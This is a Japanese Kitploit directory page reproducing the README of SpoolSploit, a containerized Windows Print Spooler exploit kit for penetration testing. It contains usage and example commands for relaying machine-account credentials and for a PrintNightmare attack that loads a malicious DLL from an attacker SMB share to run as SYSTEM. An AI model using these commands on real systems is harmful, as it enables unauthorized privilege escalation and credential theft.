Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/beetlechunks/spoolsploit
特権昇格脆弱性スキャナーコンテナセキュリティエクスプロイトフレームワークエクスプロイト横移動ペネトレーションテスト
GitHubbeetlechunks/spoolsploit

SpoolSploit

Windows プリントスプーラーのエクスプロイトを、実用的な悪用を目的として他のユーティリティと共にコンテナ化したコレクション。

リポジトリを見る
55291185年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SpoolSploit

Windowsのプリントスプーラーのエクスプロイトを集め、他のユーティリティとともにコンテナ化し、実用的な悪用を可能にします。

概要

SpoolSploitは、Windowsのプリントスプーラーのエクスプロイトを集め、他のユーティリティとともにコンテナ化し、実用的な悪用を可能にするものです。特権を昇格させ、エンドポイント上で完全なシステムアクセス権を持つ悪意のあるDLLを実行するために、マシンアカウントの資格情報をリレーする非常に効果的な方法がいくつかあります。

img

はじめに

本リリース時点では、SpoolSploit Dockerコンテナは最新バージョンのMacOS、Ubuntu Linux、Windows 10で正常に動作確認されています。

必須ではありませんが、SpoolSploitコンテナ内で悪意のあるDLLをホストしたり、資格情報リレー攻撃を行いたい場合は、Dockerを実行しているホストのポート445が使用中でないことを確認してください。これは特にWindowsホストでこのコンテナを実行する場合に顕著です。デフォルトでポート445を使用するためです。ホストのポート445を無効にすることが現実的でない場合でも問題ありません!ネットワークアダプタをブリッジモードに設定した仮想マシンでDockerコンテナを実行するだけで、悪意のあるDLLの提供や資格情報のリレーが可能になります。悪意のあるDLLのみを提供したい場合は、ホストOSの匿名アクセス共有や侵害されたサーバーの共有にDLLをホストするだけで構いません。

SpoolSploit Dockerコンテナの作成とアクセス

  1. このリポジトリをクローンする
git clone https://github.com/BeetleChunks/SpoolSploit
  1. SpoolSploit Dockerコンテナイメージをビルドする
cd SpoolSploit
sudo docker build -t spoolsploit .
  1. SpoolSploit Dockerコンテナを作成して起動する
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
  1. コンテナにアタッチする
sudo docker exec -it spoolsploit /bin/bash

コマンドラインの使い方

usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
  -h, --help            show this help message and exit
  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
                        Attack type to execute on target(s).
  -rH RHOST, --rhost RHOST
                        Remote target IP, CIDR range, or filename (file:<path>)
  -rP {139,445}, --rport {139,445}
                        Remote SMB server port.
  -lH LHOST, --lhost LHOST
                        Listening hostname or IP
  -lS LSHARE, --lshare LSHARE
                        Staging SMB share (UNC)
  -d DOMAIN, --domain DOMAIN
                        Domain for authentication
  -u USER, --username USER
                        Username for authentication
  -p PASSWD, --password PASSWD
                        Password for authentication

例 - spoolsample:
  python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

例 - nightmare:
  python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - Windowsマシンアカウント資格情報のキャプチャとリレー

SpoolSploit Dockerコンテナには、SpoolSploitでspoolsample攻撃を実行して得られたマシンアカウントのハッシュをリレーするためのResponderが含まれています。特権昇格のために特権マシンアカウント資格情報をリレーするプロセスを詳細に説明した優れた記事がいくつか存在するため、ここではその詳細には触れません。

PrintNightmare (CVE-2021-1675) - Windowsターゲット上でSYSTEMとして悪意のあるDLLを実行

SpoolSploitコンテナには、Impacketを介して実装されたSMBサーバーが含まれています。このサーバーは、SpoolSploitでprintnightmare攻撃を実行する際に悪意のあるDLLをホストするために使用できます。デフォルトのSMBサーバー設定でも動作しますが、カスタマイズしたい場合は、/home/dlogmas/smbserver/smb-v1.confにある設定ファイルを変更できます。

必要なことは、DLLをSpoolSploitコンテナ内のSMBサーバーの共有フォルダにコピーすることだけです。コンテナ内の共有パスは/home/dlogmas/smbserver/share/です。以下のコマンドは、DLLをSpoolSploitコンテナにアップロードし、SMBサーバーからアクセス可能にする方法を示しています。

sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'

免責事項

この概念実証コードは学術研究用に作成されたものであり、明示的に許可された場合を除き、システムに対して使用することを意図していません。コードは現状のまま提供され、その実行に関していかなる保証も約束もありません。このコードの誤用について、私は一切の責任を負いません。

謝辞

SpoolSample - Microsoftの機能

  • leechristensenがSpoolSampleエクスプロイトを発見し、C#のPOC SpoolSampleを作成しました。
  • 3xocyteがPython2のSpoolSample POC dementorを作成しました。

PrintNightmare - CVE-2021-1675 / CVE-2021-34527

  • cube0x0がImpacketにMS-PARおよびMS-RPRNプロトコルとAPIコールを実装した後、PythonのPrintNightmareエクスプロイトを作成しました。
  • Zhiniang Peng と Xuefeng Li がこのエクスプロイトを発見しました。
ツールをダウンロード